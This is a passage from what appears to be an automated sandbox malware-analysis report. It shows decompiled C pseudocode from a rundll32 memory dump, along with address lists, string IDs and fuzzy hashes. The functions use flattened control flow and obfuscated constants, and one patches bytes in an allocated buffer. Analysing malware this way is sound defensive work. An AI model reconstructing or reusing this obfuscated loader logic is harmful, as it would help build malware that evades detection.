                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				void* _t345;
                                                                                                                      				void* _t377;
                                                                                                                      				void* _t378;
                                                                                                                      				void* _t386;
                                                                                                                      				void* _t393;
                                                                                                                      				intOrPtr _t403;
                                                                                                                      				intOrPtr* _t406;
                                                                                                                      				void* _t408;
                                                                                                                      				signed char* _t414;
                                                                                                                      				signed char* _t450;
                                                                                                                      				intOrPtr* _t455;
                                                                                                                      				intOrPtr _t456;
                                                                                                                      				intOrPtr _t457;
                                                                                                                      				void* _t458;
                                                                                                                      				signed char* _t459;
                                                                                                                      				signed int _t460;
                                                                                                                      				signed int _t461;
                                                                                                                      				signed int _t462;
                                                                                                                      				signed int _t463;
                                                                                                                      				signed int _t464;
                                                                                                                      				signed int _t465;
                                                                                                                      				signed int _t466;
                                                                                                                      				signed int _t467;
                                                                                                                      				signed int _t468;
                                                                                                                      				signed int _t469;
                                                                                                                      				void* _t470;
                                                                                                                      				void* _t471;
                                                                                                                      				void* _t474;
                                                                                                                      
                                                                                                                      				_t406 = _a8;
                                                                                                                      				_t456 = _a4;
                                                                                                                      				_push(_a20);
                                                                                                                      				_t455 = _a16;
                                                                                                                      				_push(_t455);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_t406);
                                                                                                                      				_push(_t456);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t345);
                                                                                                                      				_v256 = 0xcf1dac;
                                                                                                                      				_t471 = _t470 + 0x1c;
                                                                                                                      				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                      				_v256 = _v256 << 2;
                                                                                                                      				_t408 = 0x8e80a37;
                                                                                                                      				_v256 = _v256 + 0xffff9089;
                                                                                                                      				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                      				_v160 = 0x25617a;
                                                                                                                      				_v160 = _v160 << 2;
                                                                                                                      				_v160 = _v160 ^ 0x009585a8;
                                                                                                                      				_v264 = 0x39e017;
                                                                                                                      				_v264 = _v264 + 0xffffbc9c;
                                                                                                                      				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                      				_v264 = _v264 + 0xffffd7b2;
                                                                                                                      				_v264 = _v264 ^ 0xb125b990;
                                                                                                                      				_v240 = 0xb82586;
                                                                                                                      				_t460 = 0x74;
                                                                                                                      				_v240 = _v240 / _t460;
                                                                                                                      				_v240 = _v240 << 1;
                                                                                                                      				_t461 = 0x3b;
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_v240 = _v240 * 0x36;
                                                                                                                      				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                      				_v180 = 0xcab8fe;
                                                                                                                      				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                      				_v180 = _v180 | 0x3e03c42f;
                                                                                                                      				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                      				_v248 = 0x57862;
                                                                                                                      				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                      				_v248 = _v248 / _t461;
                                                                                                                      				_t462 = 0x62;
                                                                                                                      				_v248 = _v248 / _t462;
                                                                                                                      				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                      				_v252 = 0x68f561;
                                                                                                                      				_v252 = _v252 << 6;
                                                                                                                      				_v252 = _v252 >> 0xd;
                                                                                                                      				_v252 = _v252 | 0x3cddc102;
                                                                                                                      				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                      				_v192 = 0x7c8e99;
                                                                                                                      				_v192 = _v192 + 0x829c;
                                                                                                                      				_v192 = _v192 * 0x31;
                                                                                                                      				_v192 = _v192 ^ 0x17fda794;
                                                                                                                      				_v228 = 0x74d91a;
                                                                                                                      				_v228 = _v228 << 3;
                                                                                                                      				_v228 = _v228 + 0x7502;
                                                                                                                      				_v228 = _v228 * 0x63;
                                                                                                                      				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                      				_v208 = 0xc909ae;
                                                                                                                      				_v208 = _v208 << 1;
                                                                                                                      				_t463 = 0xb;
                                                                                                                      				_v208 = _v208 / _t463;
                                                                                                                      				_v208 = _v208 ^ 0x00276772;
                                                                                                                      				_v164 = 0x673800;
                                                                                                                      				_v164 = _v164 << 9;
                                                                                                                      				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                      				_v232 = 0xb859bd;
                                                                                                                      				_v232 = _v232 + 0xde76;
                                                                                                                      				_t464 = 0x5b;
                                                                                                                      				_v232 = _v232 * 0x1c;
                                                                                                                      				_v232 = _v232 * 0x30;
                                                                                                                      				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                      				_v172 = 0x7eda56;
                                                                                                                      				_v172 = _v172 << 3;
                                                                                                                      				_v172 = _v172 ^ 0x03f50911;
                                                                                                                      				_v184 = 0x2f7891;
                                                                                                                      				_v184 = _v184 / _t464;
                                                                                                                      				_t465 = 0x41;
                                                                                                                      				_v184 = _v184 * 0x49;
                                                                                                                      				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                      				_v148 = 0x4a0bea;
                                                                                                                      				_v148 = _v148 ^ 0x502016f1;
                                                                                                                      				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                      				_v260 = 0x9ebd58;
                                                                                                                      				_v260 = _v260 >> 8;
                                                                                                                      				_v260 = _v260 << 0xf;
                                                                                                                      				_v260 = _v260 + 0xb306;
                                                                                                                      				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                      				_v204 = 0xce3506;
                                                                                                                      				_v204 = _v204 << 0xf;
                                                                                                                      				_v204 = _v204 << 0xc;
                                                                                                                      				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                      				_v244 = 0xe7c592;
                                                                                                                      				_v244 = _v244 >> 5;
                                                                                                                      				_v244 = _v244 ^ 0x506a7775;
                                                                                                                      				_v244 = _v244 << 1;
                                                                                                                      				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                      				_v268 = 0x1d8a79;
                                                                                                                      				_v268 = _v268 << 2;
                                                                                                                      				_v268 = _v268 / _t465;
                                                                                                                      				_v268 = _v268 | 0x253986a4;
                                                                                                                      				_v268 = _v268 ^ 0x2531568a;
                                                                                                                      				_v216 = 0x116531;
                                                                                                                      				_t466 = 0x61;
                                                                                                                      				_v216 = _v216 * 0x66;
                                                                                                                      				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                      				_v216 = _v216 ^ 0xf917010b;
                                                                                                                      				_v200 = 0xc05f9c;
                                                                                                                      				_v200 = _v200 / _t466;
                                                                                                                      				_v200 = _v200 * 0x6f;
                                                                                                                      				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                      				_v212 = 0xdb89ea;
                                                                                                                      				_v212 = _v212 >> 0xa;
                                                                                                                      				_v212 = _v212 >> 9;
                                                                                                                      				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                      				_v152 = 0x38fb70;
                                                                                                                      				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                      				_v152 = _v152 ^ 0x313af23a;
                                                                                                                      				_v136 = 0x7e2008;
                                                                                                                      				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                      				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                      				_v196 = 0x9c4278;
                                                                                                                      				_t467 = 0x4e;
                                                                                                                      				_v196 = _v196 * 0x7e;
                                                                                                                      				_v196 = _v196 ^ 0xa26962db;
                                                                                                                      				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                      				_v220 = 0x1e88f4;
                                                                                                                      				_v220 = _v220 >> 4;
                                                                                                                      				_v220 = _v220 >> 7;
                                                                                                                      				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                      				_v140 = 0xc2e6ba;
                                                                                                                      				_v140 = _v140 + 0x8875;
                                                                                                                      				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                      				_v188 = 0xdb74c;
                                                                                                                      				_v188 = _v188 << 4;
                                                                                                                      				_v188 = _v188 * 0x5c;
                                                                                                                      				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                      				_v236 = 0x62ea5;
                                                                                                                      				_v236 = _v236 / _t467;
                                                                                                                      				_v236 = _v236 >> 0xb;
                                                                                                                      				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                      				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                      				_v144 = 0x2b6271;
                                                                                                                      				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                      				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                      				_v224 = 0x8bb898;
                                                                                                                      				_v224 = _v224 + 0x43a9;
                                                                                                                      				_v224 = _v224 << 0x10;
                                                                                                                      				_t468 = 0x71;
                                                                                                                      				_t469 = _v132;
                                                                                                                      				_v224 = _v224 / _t468;
                                                                                                                      				_v224 = _v224 ^ 0x023712cd;
                                                                                                                      				_v156 = 0xb23c07;
                                                                                                                      				_v156 = _v156 + 0x4ded;
                                                                                                                      				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                      				_v168 = 0xb501ce;
                                                                                                                      				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                      				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                      				_v176 = 0xab8984;
                                                                                                                      				_v176 = _v176 * 0x22;
                                                                                                                      				_v176 = _v176 ^ 0x16c84308;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t474 = _t408 - 0xd9acfaa;
                                                                                                                      						if(_t474 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t474 == 0) {
                                                                                                                      							E00698519(_v236, _v144, _v128);
                                                                                                                      							_t408 = 0xfbb751f;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t408 == 0x15a913b) {
                                                                                                                      							_v40 = _t456;
                                                                                                                      							_v92 =  &_v32;
                                                                                                                      							_v56 =  *_t455;
                                                                                                                      							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                      							_v88 = 0x20;
                                                                                                                      							_t393 = E00687735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                      							_t471 = _t471 + 0x10;
                                                                                                                      							if(_t393 == 0) {
                                                                                                                      								L20:
                                                                                                                      								return _v132;
                                                                                                                      							}
                                                                                                                      							_t408 = 0xf0a856e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t408 == 0x3749e66) {
                                                                                                                      							_t469 = E00690AE0(_v176, _v168);
                                                                                                                      							_t408 = 0x46acfc9;
                                                                                                                      							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t408 == 0x46acfc9) {
                                                                                                                      							_push(_t408);
                                                                                                                      							_push(_t408);
                                                                                                                      							_t403 = E00687FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E006870B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E0069AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00687E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0068ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0068A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E00690AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E00698519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}
                                                                                                                      0x0068d498
                                                                                                                      0x0068d486
                                                                                                                      0x0068d486
                                                                                                                      0x0068d491
                                                                                                                      0x0068d491
                                                                                                                      0x00000000
                                                                                                                      0x0068d484
                                                                                                                      0x0068d45b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d461
                                                                                                                      0x0068d461
                                                                                                                      0x0068d569
                                                                                                                      0x0068d6ac
                                                                                                                      0x0068d6b1
                                                                                                                      0x0068d6b6
                                                                                                                      0x0068d6c2
                                                                                                                      0x00000000
                                                                                                                      0x0068d6c2
                                                                                                                      0x0068d6b8
                                                                                                                      0x00000000
                                                                                                                      0x0068d6b8
                                                                                                                      0x0068d575
                                                                                                                      0x0068d65b
                                                                                                                      0x0068d674
                                                                                                                      0x0068d679
                                                                                                                      0x0068d67e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d684
                                                                                                                      0x00000000
                                                                                                                      0x0068d684
                                                                                                                      0x0068d581
                                                                                                                      0x0068d5b9
                                                                                                                      0x0068d5c8
                                                                                                                      0x0068d5d1
                                                                                                                      0x0068d5ee
                                                                                                                      0x0068d5f3
                                                                                                                      0x0068d60e
                                                                                                                      0x0068d613
                                                                                                                      0x0068d616
                                                                                                                      0x0068d619
                                                                                                                      0x0068d61d
                                                                                                                      0x0068d630
                                                                                                                      0x0068d63f
                                                                                                                      0x0068d646
                                                                                                                      0x0068d64b
                                                                                                                      0x0068d64f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d626
                                                                                                                      0x0068d628
                                                                                                                      0x0068d628
                                                                                                                      0x0068d62b
                                                                                                                      0x0068d62c
                                                                                                                      0x00000000
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d589
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d5a1
                                                                                                                      0x00000000
                                                                                                                      0x0068d6c7
                                                                                                                      0x0068d6c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                      • API String ID: 0-3591755710
                                                                                                                      • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                      • Instruction ID: 84c7abc700a7581bdc5ae8e8fd859eee550ffddc10bfb16ee88d8faa1370318b
                                                                                                                      • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                      • Instruction Fuzzy Hash: FD1211715083809FD768DF25C486A5BFBF2FBC4348F208A1DF69A86261DBB19944CF52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069907F(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr* _v4;
                                                                                                                      				char _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				unsigned int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				void* _t284;
                                                                                                                      				void* _t285;
                                                                                                                      				intOrPtr _t286;
                                                                                                                      				void* _t293;
                                                                                                                      				void* _t301;
                                                                                                                      				signed int _t304;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				void* _t311;
                                                                                                                      				intOrPtr* _t343;
                                                                                                                      				void* _t347;
                                                                                                                      				signed int* _t348;
                                                                                                                      
                                                                                                                      				_t348 =  &_v132;
                                                                                                                      				_t343 = __ecx;
                                                                                                                      				_v4 = __ecx;
                                                                                                                      				_v40 = 0x7c806d;
                                                                                                                      				_v40 = _v40 + 0x9e80;
                                                                                                                      				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                      				_v12 = 0xea5ac0;
                                                                                                                      				_v12 = _v12 + 0xffff451e;
                                                                                                                      				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                      				_v24 = 0xace3a9;
                                                                                                                      				_t347 = 0;
                                                                                                                      				_t304 = 0xa;
                                                                                                                      				_v24 = _v24 / _t304;
                                                                                                                      				_v24 = _v24 ^ 0x001149f7;
                                                                                                                      				_t301 = 0x97dfe60;
                                                                                                                      				_v112 = 0x63471f;
                                                                                                                      				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                      				_v112 = _v112 | 0x0d4cecae;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                      				_v28 = 0x68a2fc;
                                                                                                                      				_t305 = 0x5b;
                                                                                                                      				_v28 = _v28 * 0x1c;
                                                                                                                      				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                      				_v84 = 0x508d02;
                                                                                                                      				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                      				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                      				_v124 = 0xc0d8a4;
                                                                                                                      				_v124 = _v124 + 0xffffd7c7;
                                                                                                                      				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                      				_v124 = _v124 + 0xffffcd63;
                                                                                                                      				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                      				_v116 = 0xc7a01f;
                                                                                                                      				_v116 = _v116 * 0x50;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_v116 = _v116 + 0x525d;
                                                                                                                      				_v116 = _v116 ^ 0x3100192e;
                                                                                                                      				_v88 = 0x173e76;
                                                                                                                      				_v88 = _v88 / _t305;
                                                                                                                      				_v88 = _v88 + 0xcdb8;
                                                                                                                      				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                      				_v48 = 0x3a45de;
                                                                                                                      				_t306 = 0x3d;
                                                                                                                      				_v48 = _v48 / _t306;
                                                                                                                      				_v48 = _v48 ^ 0x0006d702;
                                                                                                                      				_v52 = 0xd8d0f7;
                                                                                                                      				_v52 = _v52 | 0xabcf1793;
                                                                                                                      				_v52 = _v52 + 0xffff6a1e;
                                                                                                                      				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                      				_v64 = 0xff5420;
                                                                                                                      				_v64 = _v64 >> 9;
                                                                                                                      				_v64 = _v64 + 0xffff2626;
                                                                                                                      				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                      				_v80 = 0x65116e;
                                                                                                                      				_v80 = _v80 >> 9;
                                                                                                                      				_v80 = _v80 | 0xde6750c8;
                                                                                                                      				_v80 = _v80 ^ 0xde6208e1;
                                                                                                                      				_v56 = 0x2d6903;
                                                                                                                      				_v56 = _v56 >> 0xc;
                                                                                                                      				_v56 = _v56 + 0xffff4c70;
                                                                                                                      				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                      				_v132 = 0xe5be5a;
                                                                                                                      				_v132 = _v132 + 0xfffffbec;
                                                                                                                      				_v132 = _v132 << 3;
                                                                                                                      				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                      				_v132 = _v132 ^ 0x418237eb;
                                                                                                                      				_v108 = 0x3fa801;
                                                                                                                      				_v108 = _v108 + 0x902;
                                                                                                                      				_v108 = _v108 >> 7;
                                                                                                                      				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                      				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                      				_v72 = 0x454e35;
                                                                                                                      				_v72 = _v72 + 0x4c9c;
                                                                                                                      				_t307 = 0x29;
                                                                                                                      				_v72 = _v72 / _t307;
                                                                                                                      				_v72 = _v72 ^ 0x000328df;
                                                                                                                      				_v32 = 0x46b9f;
                                                                                                                      				_v32 = _v32 >> 4;
                                                                                                                      				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                      				_v16 = 0xab007f;
                                                                                                                      				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                      				_v16 = _v16 ^ 0x56002f48;
                                                                                                                      				_v100 = 0xb9d48c;
                                                                                                                      				_v100 = _v100 | 0xb434f54e;
                                                                                                                      				_v100 = _v100 >> 0x10;
                                                                                                                      				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                      				_v92 = 0x17070b;
                                                                                                                      				_t308 = 0x37;
                                                                                                                      				_v92 = _v92 / _t308;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                      				_v60 = 0xdb418a;
                                                                                                                      				_v60 = _v60 * 0x4d;
                                                                                                                      				_v60 = _v60 << 2;
                                                                                                                      				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                      				_v68 = 0x99d1b0;
                                                                                                                      				_v68 = _v68 << 1;
                                                                                                                      				_v68 = _v68 + 0xadc1;
                                                                                                                      				_v68 = _v68 ^ 0x01384a96;
                                                                                                                      				_v120 = 0xfb4a64;
                                                                                                                      				_v120 = _v120 | 0x92bfeeef;
                                                                                                                      				_v120 = _v120 + 0x1827;
                                                                                                                      				_v120 = _v120 >> 5;
                                                                                                                      				_v120 = _v120 ^ 0x0494323d;
                                                                                                                      				_v128 = 0xf75f57;
                                                                                                                      				_v128 = _v128 >> 4;
                                                                                                                      				_v128 = _v128 + 0xe158;
                                                                                                                      				_v128 = _v128 + 0xffff16ce;
                                                                                                                      				_v128 = _v128 ^ 0x000f9950;
                                                                                                                      				_v76 = 0xb94cf;
                                                                                                                      				_v76 = _v76 | 0xc911a6ab;
                                                                                                                      				_v76 = _v76 >> 2;
                                                                                                                      				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                      				_v104 = 0x7ca07;
                                                                                                                      				_v104 = _v104 * 0x23;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                      				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                      				_v44 = 0x308a5a;
                                                                                                                      				_v44 = _v44 >> 0x10;
                                                                                                                      				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                      				_v96 = 0x427aa5;
                                                                                                                      				_v96 = _v96 + 0xed3d;
                                                                                                                      				_v96 = _v96 + 0xffff13f4;
                                                                                                                      				_v96 = _v96 ^ 0x0046a078;
                                                                                                                      				_v20 = 0xf8f4;
                                                                                                                      				_v20 = _v20 * 0x4a;
                                                                                                                      				_t284 = 0x4469cd4;
                                                                                                                      				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                      				_v36 = 0x7998ac;
                                                                                                                      				_v36 = _v36 >> 0xc;
                                                                                                                      				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                      				do {
                                                                                                                      					while(_t301 != _t284) {
                                                                                                                      						if(_t301 == 0x661bd7c) {
                                                                                                                      							E0068957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                      						} else {
                                                                                                                      							if(_t301 == 0x8cd68b1) {
                                                                                                                      								_push(_v116);
                                                                                                                      								_push(_v124);
                                                                                                                      								_t293 = E0069DCF7(_v84, 0x681954, __eflags);
                                                                                                                      								_push(_v52);
                                                                                                                      								_push(_v48);
                                                                                                                      								__eflags = E00689462(_t293, _v80,  &_v8, E0069DCF7(_v88, 0x681814, __eflags), _v56, _v40) - _v12;
                                                                                                                      								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                      								E0068A8B0(_v132, _t293, _v108);
                                                                                                                      								E0068A8B0(_v72, _t294, _v32);
                                                                                                                      								_t343 = _v4;
                                                                                                                      								L8:
                                                                                                                      								_t284 = 0x4469cd4;
                                                                                                                      								_t348 =  &(_t348[0xb]);
                                                                                                                      								goto L9;
                                                                                                                      							} else {
                                                                                                                      								if(_t301 != 0x97dfe60) {
                                                                                                                      									goto L9;
                                                                                                                      								} else {
                                                                                                                      									_t301 = 0x8cd68b1;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						return _t347;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v100);
                                                                                                                      					_t285 = E0069DCF7(_v16, 0x681854, __eflags);
                                                                                                                      					_pop(_t311);
                                                                                                                      					_t286 =  *0x6a3dfc; // 0x0
                                                                                                                      					__eflags = E0068AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                      					_t301 = 0x661bd7c;
                                                                                                                      					_t347 =  ==  ? 1 : _t347;
                                                                                                                      					E0068A8B0(_v104, _t285, _v44);
                                                                                                                      					goto L8;
                                                                                                                      					L9:
                                                                                                                      					__eflags = _t301 - 0x94c729c;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L12;
                                                                                                                      			}

                                                                                                                      0x006995ba
                                                                                                                      0x00000000
                                                                                                                      0x00699497
                                                                                                                      0x0069949d
                                                                                                                      0x00000000
                                                                                                                      0x006994a3
                                                                                                                      0x006994a3
                                                                                                                      0x00000000
                                                                                                                      0x006994a3
                                                                                                                      0x0069949d
                                                                                                                      0x00699495
                                                                                                                      0x006995ef
                                                                                                                      0x006995f9
                                                                                                                      0x006995f9
                                                                                                                      0x0069953c
                                                                                                                      0x00699545
                                                                                                                      0x00699550
                                                                                                                      0x00699556
                                                                                                                      0x00699564
                                                                                                                      0x006995a0
                                                                                                                      0x006995a2
                                                                                                                      0x006995ab
                                                                                                                      0x006995b0
                                                                                                                      0x00000000
                                                                                                                      0x006995bd
                                                                                                                      0x006995bd
                                                                                                                      0x006995bd
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                      • API String ID: 0-668800459
                                                                                                                      • Opcode ID: d82b1ef04f7e83c3eef04a36bf1c3aec4422f9019696af1e44c5fc1860d7f77d
                                                                                                                      • Instruction ID: 72608163c4afc3059a6bad2a2927955e9ae782f9b36073bff681ed6ed8962509
                                                                                                                      • Opcode Fuzzy Hash: d82b1ef04f7e83c3eef04a36bf1c3aec4422f9019696af1e44c5fc1860d7f77d
                                                                                                                      • Instruction Fuzzy Hash: F7D111B11087808FD7A9CF25C48A50BBBF2FBC4758F50891DF5AA86260DBB58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E0069D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				char _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
